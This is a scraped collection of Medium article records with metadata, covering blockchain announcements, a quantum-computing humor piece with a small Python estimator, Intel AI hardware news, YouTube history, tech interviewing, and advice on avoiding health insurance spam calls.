That first time I watched his ride share pull away from the curb, he looked up at me looking down at him from an upper window. From behind his dark-rimmed glasses, he gave me a goofy smile. I wasn’t sure because the car was pulling away, but I think he winked at me. | https://medium.com/sexual-tendencies/socks-shoes-turned-him-on-b112fb56900b | [] | 2020-07-01 22:28:31.001000+00:00 | ['This Happened To Me', 'Sexuality', 'True Story', 'LGBTQ', 'Technology'] |
109 | ZeroBank signs a Strategic Partnership with Bac A Money Transfer — a subsidiary of Bac A Bank | We are excited to announce our partnership with Bac A Money Transfer on 12th June 2018. At the Memorandum of Understanding (MOU) session, top panel members from Bac A Money Transfer were present, including Mr. Le Ngoc Hong Nhat — Deputy General Director of Bac A Bank and member of the Board of Directors of Bac A Money Transfer; Mr. Chu Nguyen Binh — Deputy General Director of Bac A Bank; and Mr. Chau Vinh Huy — Deputy Director of Bac A Money Transfer.
Under our partnership agreement, ZeroBank will be developing a non-commercial international money transfer application for the iOS and Android operating systems, utilizing blockchain and smart contract technologies. Meanwhile, Bac A Money Transfer will be taking charge of testing and providing feedback for the ZeroBank application and helping improve our service. By joining in partnership with Bac A Money Transfer, we will have the quality and functions of the ZeroBank application optimized.
The signing of the agreement with Bac A Money Transfer shows our determination to achieve our goal in providing a world-changing money exchange and transfer service to solve the current problems within the cross-border money exchange industry.
Speaking about the ZeroBank project, Mr. Chau Vinh Huy — Deputy Director of Bac A Money Transfer — shared with us: “Applying blockchain technology in the finance and banking industry is an indispensable trend across the globe, and Vietnam is no exception. The application of blockchain technology can help cut costs effectively and improve security for the banking system. Bac A Money Transfer is glad to cooperate with ZeroBank, which is built and run by an expert team who hold strategic positions at world-class finance and banking organizations and have extensive experience in banking IT. Our partnership will benefit both parties in finding solutions to improve our service quality.”
Mr Chau Vinh Huy- Deputy Director of Bac A Money Transfer is speaking about the partnership with ZeroBank
ZeroBank is excited about this opportunity to improve our service quality and upgrade its security. Mr. Nguyen Nhu Nguyen — CFO of ZeroBank — responded to this event: “There’s no hassle working with Bac A Money Transfer and sharing with them about topics related to remittances. Our CTO, Mr. Bao Ly, also shares his knowledge of banking management technology. Bac A Money Transfer is always open to new technology; that’s why they’re looking forward to growing with the ZeroBank project by signing the MOU with the team. ZeroBank has an outstanding team with extensive experience in non-commercial money transfer. More than that, our core members are super minds in the money exchange and remittance industry. They have been working at top international banking institutions yet are still hungry to pursue the higher goal of delivering a better money transfer service for end users, especially for people living in Southeast Asia.”
*About ZeroBank:
ZeroBank provides everyone with a faster, more convenient and more secure money exchange and transfer method with minimal fee by applying blockchain technology, smart contract along with sharing economy model.
*About Bac A Money Transfer:
Bac A Money Transfer is a subsidiary of Bac A Bank, which has more than 20 years of experience providing safe and trusted banking services for individuals as well as enterprises. Bac A Bank is a commercial joint-stock bank in Vietnam with authorized capital stock of up to 5,500 billion VND; its after-tax profit reached 5,223 billion and 387 billion (VND) in 2017.
Aiming for the position of a top-leading bank by 2020, Bac A Bank is a pioneer in investment and consulting for a generation of sustainable-development enterprises, along with high-technology applications in agriculture and social security projects. Bac A Bank has also been honored multiple times with certificates of merit and has won many other prestigious international awards:
Emulation flags of the Government
Vietnam Outstanding Banking Awards 2017
Excellent Business Service Award 2017
Best Bank in Sustainable Development for Community 2015–2016 (Vietnam Outstanding Banking Awards)
Best Corporate Social Responsibility Bank of Vietnam 2016 (by International Finance Magazine (IFM))
Best Innovative Products 2016
Stay updated on our channels: | https://medium.com/zerobank-cash/zerobank-signs-a-strategic-partnership-with-bac-a-money-transfer-32ddf0a810ea | ['Zerobank - Your Local Currency'] | 2018-07-17 03:21:33.686000+00:00 | ['Technology', 'Blockchain', 'Remittances'] |
110 | The stupidest, most technologically and resource inefficient way to multiply by two | The stupidest, most technologically and resource inefficient way to multiply by two
Photo by Drew Graham on Unsplash
What you will read here is a bad idea. Don’t try this at home. You’ve been warned. I’ll be using a metaphorical sledgehammer to crack a hypothetical nut. I am trying to do a much, much lamer version of using a drone to change a light bulb.
Using a quantum computer to multiply by 2, morally — Photo by unknown author on Reddit
What I want is quite simple — I want to calculate 2ⁿ, 2 to the power of n, for any integer n. For example, 2² = 4. That is not a particularly difficult problem. You can work it out pretty reliably by hand using techniques learned in grade school. Or, you can find a table online.
This really isn’t that hard—source: Wikipedia
Suppose I asked my digital assistant for the answer, though. I think you will agree that this might be a bit overkill given how much energy and sophistication is necessary to make the cloud work. But, that is not enough. We want the “killing a mosquito with a bazooka” method. For that, we need to move beyond digital technology and consult a quantum computer! That’s right, and I’m going to use a goddamn quantum computer to multiply by 2.
Get Quantum
Great, so for that, we need a quantum algorithm. Let’s get a bit technical for a second. Below is an algorithm that can compute any eight consecutive powers of 2. (Why eight? Well, quantum computers are kind of small right now.) It looks like a standard electronic circuit, with wires and components and such, but it’s quantum. That means, instead of bits of information, it uses quantum bits (qubits). The first wire is a scratch qubit — it’s just there to help with the calculation. The next three are the binary expansion of n — that’s the input data. Below I have input “111”, so I am asking for 2⁸. (The answer is 256, by the way.)
Circuit for raising 2 to some power. Made using the IBMQ Composer.
Cool, cool. So, that looks pretty complicated. We’re on the right track. Now, we just need some magic techno machine to run the algorithm on. Luckily, I have access to a quantum computer. (Don’t be too impressed — you do too.) I will use one of IBM’s cloud quantum computers. In particular, I will use the quantum processor called “ibmq_16_melbourne,” which is a quantum chip made of superconducting material sitting in a laboratory device that is one hundred times colder than outer space.
Specs for “ibmq_16_melbourne” on 6 June 2021. You can find specs for your IBMQ services here.
I ran the circuit above on IBM’s quantum computer 1,024 times. Unfortunately, the desired outcome showed up only 8 times — that’s less than 1% accuracy. The most common answer, showing up about 1% of the time, was 160. The correct answer, recall, is 256. So… this is not good.
Actually, using a quantum computer to multiply by 2. Photo by unknown author on gifs.com.
The quantum Rube Goldberg solution
Alright, so what gives? At the moment, quantum computers are too noisy to perform arithmetic, but that will not deter Progress™. We need to hack this. How can we get this device to calculate 2⁸? First, we need to ask what a quantum computer is really good at (today). That’s easy! So (today), a quantum computer is pretty good at one thing: making random bit strings. And, how many bit strings can n qubits generate? 2ⁿ!
I like this idea. It’s so simple. It presents a little conundrum, though. Imagine we start performing random experiments and recording outcomes with the intent of estimating the total number of possible outcomes, including those we haven’t even seen yet. Seems almost impossible, right? Well, this is the kind of statistics problem Alan Turing and teams of WWII cryptographers faced when trying to crack ciphers. And, when you stop for a moment, you realize that scientists and statisticians estimate the total number of things they haven’t actually counted all the time — the total number of species on Earth, the total number of stars in the galaxy, the total number of lies in a political speech, and so on.
The core idea in estimating totals from incomplete observations is that repeated events give you a lot of information. For example, flip a coin 10 times. Suppose you see H, H, T, H, T, H, H, T, T, T. Without making assumptions, you can’t know for sure that this coin will result in only these two possible outcomes indefinitely into the future. But, the fact that 8 of the 10 events were repeated events gives you a lot of confidence that’s the case. This can all be formalized with some fancy statistics I won’t bore you with.
So, I fired up Old Faithful (that’s what I’m calling it since “ibmq_16_melbourne” doesn’t quite roll off the tongue) and performed the following procedure:
1. Select a random instruction.
2. Prepare a canonical state of the device.
3. Apply the randomly chosen instruction from Step 1.
4. Measure the system.
5. Repeat 1–4 until r repeated outcomes are seen.
6. Estimate the quantum dimension to be roughly k²/(2r), where k is the number of experiments needed.
Since the quantum dimension is 2ⁿ, where n is the number of qubits used, I would have my answer.
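The procedure above is easy to sanity-check classically, with a uniform random number generator standing in for the quantum device. This is a sketch, not the actual experiment code, and the k²/(2r) approximation is only reliable while the number of draws stays small relative to the true dimension:

```python
import random

def estimate_dimension(draw, target_repeats=599):
    """Birthday-problem estimator: keep drawing until `target_repeats`
    outcomes have repeated; with k total draws and r repeats, the number
    of possible outcomes is roughly k**2 / (2*r)."""
    seen = set()
    repeats = 0
    draws = 0
    while repeats < target_repeats:
        outcome = draw()
        draws += 1
        if outcome in seen:   # a repeated outcome
            repeats += 1
        else:
            seen.add(outcome)
    return draws ** 2 / (2 * repeats)

# Stand-in for a noiseless 15-qubit device: uniform over 2**15 outcomes.
rng = random.Random(0)
estimate = estimate_dimension(lambda: rng.randrange(2 ** 15))
print(round(estimate))  # a rough estimate of 2**15 = 32768
```

Swapping the `rng.randrange` call for actual device shots would give the hardware estimate.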
Quantum level accuracy
For my first experiment, I used 8 qubits to calculate 2⁸. The number of repeated outcomes I was looking for was 599. This is the number that would guarantee (with 95% probability) that the answer would be within 10% of the correct value. It took 849 repetitions of the experiment to reach the desired number of 599 repetitions. The answer? 259 (within 10% error of the true value, 19 times out of 20). Not bad! That’s within 2% of the correct answer!
More repetitions are obviously better. So, I waited to see 1,116 repetitions, which took 1,372 experiments. The answer then was 257. Ooo, so close! Then I was intrigued and performed a bunch more experiments with differing numbers of sought-after repetitions. The results are below.
Now, since Old Faithful has 15 qubits, the final step was obviously to calculate 2¹⁵. Again, going for 599 repetitions (which took 6,215 experiments), the answer would be accurate within 10% (with 95% confidence). And… drumroll… 2¹⁵ ≈ 32,242. (It’s actually 32,768 as per the table above, but not too shabby!) The full set of results are below.
Is there a point to all this?
No, not really. But, maybe? I was actually surprised by how accurate it was. This procedure is obviously useless for estimating 2ⁿ. But, it might be useful for quickly estimating the dimension of quantum devices. All that is necessary is to perform completely randomized experiments and look for repeated outcomes. With 95% confidence, one can estimate any dimension within 10% error by finding 599 repetitions. It takes about the square root of the actual dimension to find them all (for a fixed number of sought-after repetitions), which is the best one could hope for.
111 | Intel AI Summit 2019 | Chip Giant Accelerates AI at the Edge | At the Intel AI Summit in San Francisco on Tuesday the company put its chips on the edge, revealing its next-generation Movidius Myriad Vision Processing Unit (VPU) for edge media, computer vision and inference applications. Intel also introduced its new Edge AI DevCloud with the OpenVINO toolkit for edge devices, and demonstrated its Nervana Neural Network Processors for training (NNP-T1000) and inference (NNP-I1000).
The Nervana Neural Network Processors (NNP) are the first purpose-built ASICs for complex deep learning with incredible scale and efficiency for cloud and data center customers.
“We’re one of the largest (AI companies) due to our breadth and depth that allows us to go from the data center out to the edge. And we anticipate this growing year on year as this technology transition unfolds. But the most important thing we’ve learned is that there really is no single approach for AI,” said Naveen Rao, Intel corporate vice president and general manager of the Intel Artificial Intelligence Products Group. Rao also stressed the necessity of purpose-built hardware like Nervana NNPs and Movidius VPUs to handle AI’s increasing workloads: “With this next phase of AI, we’re reaching a breaking point in terms of computational hardware and memory.”
The new Intel products strengthen the company’s growing portfolio of AI solutions, which is expected to generate more than US$3.5 billion in revenue in 2019. The company aims to provide AI solutions for a range of industries and at any scale.
Intel’s next-generation Movidius VPU, “Keem Bay,” is a low-power, high-performance edge inferencing product that’s scheduled to become available in the first half of 2020. It incorporates efficient architectural advances to deliver more than ten times the inference performance of the previous generation with up to six times the power efficiency of competitors’ processors.
Keem Bay performance compared to NVIDIA TX2, Xavier and Ascend 310.
The DevCloud for the Edge, used by over 2700 enterprises, and the OpenVINO toolkit both address a key pain point for developers — allowing them to try, prototype and test AI solutions on a broad range of Intel processors before they buy hardware.
“Customers are rapidly adopting AI at the edge because the economic and social advantages are just too large to ignore. It’s happening in every industry from smart cities, to industrial, healthcare, and retail,” said Intel corporate vice president of IoT Jonathan Ballon. Intel hopes its hardware and software innovations can not only accelerate AI performance, but also make it easier to attain.
Now in production and also being delivered to customers next year, Intel Nervana NNPs are part of a systems-level AI approach offering a full software stack developed with open components and deep learning framework integration.
Nervana Neural Network Processor (NNP) for training (NNP-T1000)
The Nervana NNP-T strikes a balance between computing, communication and memory, enabling near-linear, energy-efficient scaling from small clusters up to the largest pod supercomputers. The Intel Nervana NNP-I meanwhile is power- and budget-efficient and ideal for running intense, multimodal inference at real-world scale using flexible form factors. Both products were developed for the AI processing needs of leading-edge AI companies like Baidu and Facebook.
Intel AI Inference Products Group General Manager Gadi Singer identified three highlights of the NNP family as power efficiency, versatility, and scale.
“In any environment you are limited by power, and power is also a major factor in the TCO (total cost of ownership) of computing. Power efficiency helps you physically put things more dense,” Singer told Synced in a press briefing.
“The second thing is versatility. Some of the solutions that we see are solving a particular problem like for image recognition, which is a very popular use. What we had as a driving force from the beginning is that it must support multiple usages.”
Singer says when it comes to scaling capability, “hardware software optimization together is a must.” NNP architecture is structured with building blocks, which makes it flexible and easy to interconnect. Intel is also working hard to customize its software to match hardware from the top down. “I actually have more of my team working on software than working on hardware.”
Facebook’s AI System Co-Design Director Misha Smelyanskiy told the summit audience: “We are excited to be working with Intel to deploy faster and more efficient inference compute with the Intel Nervana NNP-I and to extend support for our state-of-the-art deep learning compiler Glow to the NNP-I.”
Ballon also announced the first edge AI nanodegree that Intel will be offering in association with online education platform Udacity to provide industry practitioners — even those without a background in computer science — with the skills required to develop their own AI models where data is generated at the edge.
To create more opportunities for women in technology and AI, the company is making 750 scholarships available, mostly for the international non-profit organization Women Who Code, which provides services for women pursuing tech careers and a job board for companies seeking female coding professionals. | https://medium.com/syncedreview/intel-ai-summit-2019-chip-giant-accelerates-ai-at-the-edge-efe823015009 | [] | 2019-11-14 18:31:01.557000+00:00 | ['Artificial Intelligence', 'Conference', 'Technology', 'Intel', 'Hardware'] |
112 | An Introduction to Asch Chain Interoperate Protocol | Last month Asch released the chain interoperate protocol, with which Bitcoin can be transferred to the Asch chain and used in different DApps. So how is this protocol implemented?
Asch’s chain interoperate protocol is a two-way peg protocol based on a multisig federation. There are two kinds of accounts on the Asch chain: normal user accounts and gateway accounts. It is the gateway accounts that handle the different kinds of transactions between the Asch chain and the Bitcoin network. Every transaction can be checked by users on the blockchain explorer. | https://medium.com/aschplatform/an-introduction-to-asch-chain-interoperate-protocol-768fb49754ef | [] | 2018-06-26 03:45:10.798000+00:00 | ['Blockchain Technology', 'Asch', 'Development', 'Interoperability', 'Bitcoin'] |
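To make the multisig-federation idea concrete, a minimal m-of-n approval check might look like the following. This is an illustrative sketch only — the member names and threshold are hypothetical, not Asch’s actual implementation:

```python
def multisig_approved(signatures, members, threshold):
    """m-of-n federation check: a cross-chain transfer proceeds only if
    at least `threshold` distinct federation members have signed it."""
    valid = {s for s in signatures if s in members}  # ignore unknown signers
    return len(valid) >= threshold

# Hypothetical 3-of-5 gateway federation.
members = {"gw1", "gw2", "gw3", "gw4", "gw5"}
print(multisig_approved({"gw1", "gw3", "gw4"}, members, 3))  # True
print(multisig_approved({"gw1", "unknown"}, members, 3))     # False
```

Real federations check cryptographic signatures rather than bare names, but the threshold logic is the same: no single gateway can move funds on its own.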
113 | How to improve Kids Skill with STEM Learning Toys !! | How to improve Kids Skill with STEM Learning Toys !!
STEM Toys
STEM Amusement Park Set — London Eye & Ferris Wheel teaches about these wonderful places where children and adults spend countless hours of fun worldwide! This set includes one geared motor to power four large-scale models of amusement rides: Ferris wheel, London Eye, merry-go-round and booster ride. The set comes in a convenient plastic storage tub with lid for easy storage.
Additionally, you can experiment with gears by building four smaller models such as a gearbox, an experimental crane, a carousel and a planetarium. You can find easy-to-follow building instructions for all models either online or in the booklet included. The booklet provides detailed explanations of the different scientific principles applied and incorporates innovative experimental activities for hands-on learning. A Quiz section is also available to challenge your newly acquired knowledge!
STEM Amusement Park Set — London Eye & Ferris Wheel : ENGINO TOY SYSTEM is perhaps the most advanced and versatile three dimensional construction toy in the market today! What makes this product so unique is the variety of innovations in functionality and efficiency. The patented design of the parts allows snap-fit connectivity of up to 6 sides simultaneously! | https://medium.com/@toysadelaide/how-to-improve-kids-skill-with-stem-learning-toys-b1b3de3988c6 | ['Switched On Kids'] | 2020-12-18 05:30:46.909000+00:00 | ['STEM', 'Stem Education', 'Education Technology', 'Science Experiment'] |
114 | Understanding the Analytic Development Lifecycle | As discussed in one of my earlier articles, it is critical to understand the analytic development lifecycle. Your analytics will not last forever; instead, they will become obsolete and need to be retired. As you collect more and newer data, you will need to continue maintaining your current analytics while creating new ones. It is essential to understand what you will need to do at each stage of the analytic lifecycle. As seen below, I view the analytic lifecycle as five critical components: R&D, Deployment, Testing & Validation, Maintenance, and Retirement. So let’s walk through each element together!
Analytic development lifecycle — image created by the author using LucidChart
Research and Development
Research and development encompasses the first few steps in the analytic development lifecycle. After receiving your data, you will spend time looking it over, understanding its structure, and cleaning it. As you go about this process, you need to consider what analytic opportunities you see in the data, any business problems you are aware of, and how they overlap. As you work through developing your problem statement, you can begin to test out analytic concepts and develop your analytic.
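As a toy illustration of that first look at newly received data (the column names and values below are entirely invented), here is a minimal sketch using only Python's standard library:

```python
import csv
import io
import statistics

# A tiny inline sample standing in for a raw data delivery (hypothetical columns).
raw = """region,units,price
north,10,2.5
south,,3.0
east,7,2.0
north,12,
"""

rows = list(csv.DictReader(io.StringIO(raw)))

# First question: how complete is each column?
missing = {col: sum(1 for r in rows if not r[col]) for col in rows[0]}
print(missing)  # {'region': 0, 'units': 1, 'price': 1}

# Second question: what does a numeric column look like, ignoring the gaps?
units = [int(r["units"]) for r in rows if r["units"]]
print(len(units), statistics.mean(units))
```

A real project would reach for pandas or a similar library here, but the shape of the work is the same: check completeness, summarize, and only then start framing the problem.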
This process varies if you are working with existing analytics. For current analytics, you will want to understand the areas that need improvement, the methods you will utilize, and any subject matter expertise you have acquired to help you through these updates. Having follow-up conversations with a subject matter expert (SME) will help you validate whether your updates are going in the right direction.
I find the research and development phase of the process to be the most interesting as it is where you can learn the most about your data. I work alongside other data scientists, data engineers, and subject matter experts daily. These individuals help in creating data sets and developing a data dictionary to understand what the data represents. I can then understand how to combine this data with other datasets to build my analyses. I want to make sure I see the larger picture and tell a compelling story before moving further down the process. | https://towardsdatascience.com/understanding-the-analytic-development-lifecycle-2d1c9cd5692e | ['Rose Day'] | 2020-11-08 03:50:11.464000+00:00 | ['Machine Learning', 'Artificial Intelligence', 'Software Development', 'Technology', 'Data Science'] |
115 | Hungry? Buy Some KFC with Bitcoin | Two months. Online. Self-Learning to Mastery. Shortest-path to Enter the Blockchain Era.
| https://medium.com/turing-chain-institute-%E5%9C%96%E9%9D%88%E9%8F%88%E5%AD%B8%E9%99%A2/%E9%A4%93%E4%BA%86%E5%97%8E-%E7%94%A8%E6%AF%94%E7%89%B9%E5%B9%A3%E8%B2%B7%E5%80%8B%E8%82%AF%E5%BE%B7%E5%9F%BA%E5%90%A7-3c8a53e2bc73 | [] | 2019-10-10 15:27:24.496000+00:00 | ['Technology', 'Blockchain', 'Blockchain Technology', '區塊鏈']
116 | The Story Behind YouTube’s History as a Dating Site | “OK, forget the dating aspect, let’s just open it up to any video”
It soon became clear that the dating idea wasn't going to work.
This is where the team decided to open it up to every video instead of keeping it to a niche. Youtube was about to break the age-old rule of sticking to a niche early into their venture.
By breaking this rule, YouTube uploaded its first official video to the platform in April 2005 during its private beta: Karim's Me At The Zoo (yes, the video is still up!).
Within a month, YouTube launched its beta version, and the website attracted 30,000 viewers a day; within half a year, over two million users were using the site daily.
During late 2005, Sequoia Capital invested 3.5 million dollars into Youtube’s Series A. Sequoia partner Roelof Botha had worked at Paypal with the cofounders and learned about the platform after using it to upload honeymoon and wedding videos.
In October 2005, the platform saw its biggest viral video hit one million views. The video was a Nike ad featuring Ronaldinho (see below) receiving his pair of ‘Golden Boots.’ This was the first of many viral videos to hit millions of views.
The Virality Of Youtube
By the end of its first year, Youtube was receiving around 25 million views daily.
One of the biggest reasons for YouTube's success and subsequent acquisition by Google was its ability to be a virality magnet. Videos posted on the platform could go viral for many reasons, from successful ads to a simple one-minute clip of a baby biting someone else's finger.
In late 2006, YouTube was acquired by Google for 1.65 billion dollars, and the company has since skyrocketed. Today over 2 billion users visit the site every month, and it remains the second most used social platform globally.
Youtube has kickstarted the careers of many superstars of the video platform, including Pewdiepie, Michelle Phan, Psy, and more. Without the platform, many wouldn’t have had the chance to chase their passions.
Today Youtube has evolved from helping showcase amateur videos to original content, licensed by singers, bloggers, and more. It has since grown from just collecting ad revenue to a full-fledged streaming platform as well as a subscription service. | https://medium.com/cornertechandmarketing/the-story-of-youtube-s-history-as-a-dating-site-164dfae475a4 | ['Richard Liu'] | 2020-12-27 02:29:55.456000+00:00 | ['Technology', 'Marketing', 'Social Media', 'YouTube', 'Business'] |
117 | 18 interviews. 3 countries. 1 job offer. My interview journey in tech. | Photo by Clem Onojeghuo
Back in 2017, after a year of running my own start-up back in Chile and failing plus having worked in the start-up scene for over 4 years, I decided to look for opportunities outside my home country and get some international work experience, ideally in one of the big tech companies.
The process can get quite exhausting and frustrating, and my experience going through it was no exception.
First Steps — Recruiters
I think every person I’ve talked to has had a different experience with the interview process. Some people have a very smooth one, getting an offer right after the first or second interview and some others have to go through a lot to land one of these opportunities. Mine was in the latter group.
I started by reaching out to my good friends that were already working for various tech giants. This was back in late 2016, around Christmas time. Slowly, recruiters started to reach out, and I was able to schedule the first phone screener interviews for January/February of 2017. I have to say that the key to this process was being referred by other employees; that fast-tracked my application quite a lot and put my resume directly on the recruiter's desk.
Two processes: Engineer and PM!
Yes, I applied as both a Software Engineer and a PM…. let me explain.
I worked for start-ups primarily as an iOS Software Engineer, but over time I expanded my responsibilities to working in Growth, Design, Customer Engagement and Communication. And when I ran my own start-up, my role abruptly switched completely to sales and strategy.
Having worked on so many things in my start-up career allowed me to discover what I felt passionate about, and for me, I really enjoyed dipping my feet into many subjects while driving the creation and release of a product. "Product Management" looked like that, so I wanted to carry forward with my interview process as a PM. However, only about 30% of the interviews I landed were for a PM position. Tech companies can usually fill those roles without having to recruit overseas, and the demand for PMs is usually lower compared to that for Software Engineers. So, I decided to interview as a Software Engineer as well. I liked working as a SE, but I knew that sooner or later I'd want to switch over to PM.
The struggle
I had my first couple of phone screener interviews from January through March of 2017. I was on the phone with at least one company per week, from big tech giants like Google, Amazon, Microsoft to “smaller” companies like Spotify, Square, Lyft, Uber, and many others. This was my first time interviewing with companies of this scale, so the entire process was new to me. I had to train, practice and learn. I prepared using standard resources available to everyone: Cracking The PM Interview and The PM Interview. I am not someone who does well on these types of interview tests and quizzes, so I had to practice really hard.
In the span of those 3 months, I had phone screeners with a total of 18 companies. Some of them went well, some of them went horrible. I think I never got used to the phone screener experience, so I was always very nervous. In the end, I managed to move on to the next stage with 7 companies.
Lots of Travel
The toughest part for me was yet to come: the on-site interviews.
March was all about scheduling the interviews a few months in advance to prepare for extensive traveling. 7 companies across 3 countries with 2 different career tracks… it sure sounds like a lot.
To do this more efficiently, I batched interviews per continent and also per career track. The first set of interviews was going to be in Europe: Booking.com and Uber in Amsterdam and then a start-up in Berlin. That way my travels would be less exhausting for the whole month I'd spend on the continent. That was my entire month of April.
After I was done with my interviews in Europe, May kicked in and it was time to go across the pond once again, this time to the US. I first had to go all the way to Seattle for my interviews with Microsoft and Amazon, and later fly to NYC for an interview with Shutterstock.
I managed to arrange a remote “on-site” interview with Lyft from Chile before I began this world-wide interview tour, which took the pressure off from having to fly one more time, from Seattle to SF.
I have to admit, it was exciting to fly all over the world interviewing with all these great companies, getting to know how they worked, what the culture was like, and learning more about the exciting work they were doing. But the downside is that it was very exhausting to travel constantly for two months, jumping from one continent to the next. You're oftentimes jet-lagged, tired, and sleep-deprived, and somehow you have to pull yourself together and be in good shape for what can sometimes be grueling interviews.
Feeling frustrated is part of the process
The first month in Europe was challenging but I felt very energized going through the process. It’s a strange feeling because you walk out of a whole day of interviewing feeling like you gave it your best and thinking it went well, but you won’t hear back from the company until a few days have gone by. On top of that, if they say no, it’s likely that the company won’t give you any type of feedback on why they are not moving forward with you.
On my last week in Europe, two out of the three companies I had interviewed with said no. The third one wanted an additional interview with me in NYC (since I was already traveling to the US).
Looking back, I had the toughest set of interviews in the US. These were particularly exhausting, each of them averaging 5 hours. I was starting to lose faith, as I could no longer tell how well or badly an interview had gone once the day was over. After my third one, I started to think I would have to return home with no job offer, and after nearly 5 months spent in the process, that idea didn't sit well in my head. It was only when I arrived in NY and was done with all the interviews that I got a call from Microsoft with the good news, 2 weeks after I had interviewed with them.
You just have to keep going
Interviews are stressful and exhausting. Sometimes, you’ll think you did great and you won’t hear from the company again. Sometimes you’ll think it didn’t go well and you’ll get called for another round. The bottom line is that while you go through this process it’s best to not think too much about how you did, but rather focus on the next interview and improve how you answer the questions. I think it’s inevitable to feel hopeless at some point of the journey, but persevering is key. Whether it takes 3 interviews or 18 like me, you just have to keep going. | https://medium.com/@karmy/18-interviews-3-countries-1-job-offer-my-interview-journey-in-tech-b97b26aa1da5 | ['Juan Antonio Karmy'] | 2020-11-23 20:05:39.865000+00:00 | ['Tech', 'Interviewing', 'Job Interview', 'Interview', 'Technology'] |
118 | How To Avoid Health Insurance Spam Calls? | Healthcare Tech Outlook | Christopher · Jan 6 · 3 min read
Have you received unexpected calls regarding health insurance options? According to reports from consumers across the U.S., health insurance spam calls may be on the rise.
What are Health Insurance Spam Calls?
Health insurance spam calls are exactly what they sound like: calls made by scam artists attempting to persuade consumers to pay for expensive health insurance that either offers very few benefits or doesn't exist at all. Even when the company calling is legitimate and the health insurance is real, these calls may be illegal if you didn't give the caller your prior express consent to be contacted.
Health insurance spam calls began to surge in October 2019. In that month alone, around 288 million robocalls regarding health insurance offers were made to consumers in the U.S. It was a record-breaking month for scam calls overall, with around 5.7 billion robocalls received by consumers across the country.
There are many kinds of health insurance scam calls. Some callers may attempt to charge you a fee in exchange for their help navigating the health insurance marketplace. Others may tell you that you need a new insurance card and must pay a fee to receive it or risk losing your health coverage. Even though the fees they quote may seem small, their real goal may be to gain access to your credit card number or bank account information.
Many scammers target people who are on Medicare or Medical Assistance. If you have been contacted by someone claiming to be from one of these programs and asking for your credit card information or Social Security number, you may want to contact Medicare directly to ensure that these calls are real before handing over any information.
How Can You Stop Health Insurance Spam Calls?
There are a few ways to avoid receiving health insurance spam calls. In response to the increase in these intrusive robocalls, many cell phone carriers have started offering anti-robocall services to customers. These services may be able to detect potential robocalls and flag them as spam, or send them straight to voicemail. Verizon, AT&T, and T-Mobile all offer this kind of call-screening service.
Even if your carrier doesn't offer this kind of service, your phone may have built-in call-blocking software, which you may be able to activate under your settings. And even if your phone can't detect potential robocalls automatically, you may be able to block individual numbers if you are called repeatedly from the same one. Unfortunately, many scam artists will simply start calling you from a different phone number once they believe their calls are being blocked.
You may also be able to download a free or paid app to screen incoming calls and identify likely robocalls. However, robocall-blocking software isn't always effective: these apps may not detect every incoming robocall, or they may accidentally block calls from friends or family that you want to receive. In addition, apps that send robocalls straight to voicemail can have the unintended consequence of filling your voicemail box with scam messages.
Check This out : | https://medium.com/@chrishtopher-henry-38679/how-to-avoid-health-insurance-spam-calls-healthcare-tech-outlook-cefad02d4240 | [] | 2021-01-06 12:03:43.317000+00:00 | ['Spam', 'Solutions', 'Healthcare', 'Technology', 'Healthcare Tech Outlook'] |
119 | The Simple Idea of Blockchain. Disruptive technology, trustless… | Disruptive technology, trustless system, decentralized, immutable, peer-to-peer, bla bla bla. These are buzzwords associated with blockchain technology that confuse the bejeezus out of many. But it's a simple concept, and an interesting one at that.
In blockchain technology, data are stored in clusters and strung together. Each cluster of digital information sits in a block, and the blocks follow in tandem, one after another.
Let’s look at it like a database where you store information but instead of in tabular forms, they are in blocks. Each block has a storage capacity that once full, is added to the existing string of blocks. The blocks form a chronological chain. New data are stored in a fresh block.
I have compared the blockchain to a database, but it is not a database. It is a digital ledger, or data structure, where transactions can be processed. Blocks that are formed and chained together are immutable, which means they can't be changed. Each block refers to the previous one, and when a block is added to the end of the chain, it is time-stamped.
The decentralized nature of blockchain
Three features of the blockchain give it a decentralized nature:
1. Timestamps: there is a timeline of data. Data collected in groups form a block with a set of information. Each of these blocks, after being chained together, is timestamped. This means that if one block were taken out of the chain, there would be a time gap, because the timing would be altered. For instance, it would be hard to miss that block A needs to cross-check with a missing block B to get the correct timing of how and when a transaction occurred.
2. Nodes: these are servers that verify and exchange transactions. These computers are operated by different entities all over the world, and they must always come to a consensus. An attacker would need to control at least 51% of the nodes to successfully override the remaining ones. If one node has been altered, the other nodes cross-reference to fish out where the inconsistency occurred. This enables users on the blockchain to view transactions as they occur, live.
3. Hash codes: these codes are created by a maths function that turns digital information into a string of letters and numbers. Hash codes will change if any of the digital information is changed.
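The hash-linking and tamper-detection described above can be sketched in a few lines of Python. This is a toy illustration only, nothing like a production ledger:

```python
import hashlib
import json
import time

def make_block(data, prev_hash):
    """Build a block whose hash covers its data, timestamp, and the previous block's hash."""
    block = {"timestamp": time.time(), "data": data, "prev_hash": prev_hash}
    payload = json.dumps(block, sort_keys=True).encode()
    block["hash"] = hashlib.sha256(payload).hexdigest()
    return block

def is_valid(chain):
    """Valid only if every block still hashes to its stored hash and points at its predecessor."""
    for i, block in enumerate(chain):
        body = {k: v for k, v in block.items() if k != "hash"}
        if hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest() != block["hash"]:
            return False
        if i > 0 and block["prev_hash"] != chain[i - 1]["hash"]:
            return False
    return True

# Build a three-block chain, then tamper with the middle block.
chain = [make_block("genesis", "0")]
chain.append(make_block("tx: alice -> bob", chain[-1]["hash"]))
chain.append(make_block("tx: bob -> carol", chain[-1]["hash"]))
print(is_valid(chain))   # True: nothing has been altered
chain[1]["data"] = "tx: alice -> mallory"
print(is_valid(chain))   # False: the altered block no longer matches its hash
```

Changing one block's data means it no longer matches its recorded hash, and if an attacker recomputed that hash instead, the next block's prev_hash would no longer match, so the tampering surfaces either way.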
This decentralized nature of the blockchain makes it quite safe and protects the system from fraudulent acts.
Why is it a trustless system?
I think that the most confusing of all the confusion associated with blockchain technology has to do with describing it as a ‘trustless’ system. The decentralized nature of the blockchain should strengthen one’s trust in the system. Trustless shouldn’t be a word associated with it, innit?
Trustless in this regard has to do with an absence of the need to trust. The blockchain is built in such a way that each computer can act as a server for the others. This means that every user is allowed shared access to how transactions occur without the need for a central server. Every user has direct access to the information. There are no third parties. In the case of bitcoin, everyone is in control because it’s a public ledger.
Yusuf Fatai-Ayodele a Tech expert explains it clearly in these words,
